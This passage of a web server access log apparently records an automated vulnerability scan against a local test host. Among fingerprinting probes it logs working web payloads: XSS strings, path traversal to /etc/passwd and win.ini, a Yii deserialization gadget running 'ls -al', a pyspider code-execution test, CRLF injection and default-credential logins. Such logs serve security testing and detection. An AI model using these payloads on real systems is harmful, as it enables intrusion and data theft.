Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index_sso.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"webdav_mode=false&script=from+pyspider.libs.base_handler+import+*%0Aclass+Handler(BaseHandler)%3A%0A++++def+on_start(self)%3A%0A++++++++print(str(452345672+%2B+567890765))&task=%7B%0A++%22process%22%3A+%7B%0A++++%22callback%22%3A+%22on_start%22%0A++%7D%2C%0A++%22project%22%3A+%22pyspidervulntest%22%2C%0A++%22taskid%22%3A+%22data%3A%2Con_start%22%2C%0A++%22url%22%3A+%22data%3A%2Con_start%22%0A%7D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /debug/pyspidervulntest/run HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sws/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebReport/ReportServer?op=fr_server&cmd=sc_getconnectioninfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sample-apps/hello/%2f/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/XUI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/taskProc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.composer/composer.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /agc/vicidial_mysqli_errors.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /whoAmI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hue/accounts/login?next=/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ== HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0D%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/scripts/login_par.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E& HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/UI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/mstrWeb/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vendor/composer/installed.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"login=admin&pwd=admin&lang=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /op/op.Login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /whoAmI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hue/accounts/login?next=/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application.wadl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /airflow.cfg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_vti_bin/Authentication.asmx?op=Mode HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /kylin/api/admin/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?m=user&c=Users&a=logout&referurl=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /matomo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mongo-express/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /axis2/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/UI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/mstrWeb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /includes/mysql2i/mysql2i.func.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hue/accounts/login?next=/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application.wadl?detail=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db_dump.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"http://127.0.0.1/user_add.php", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini 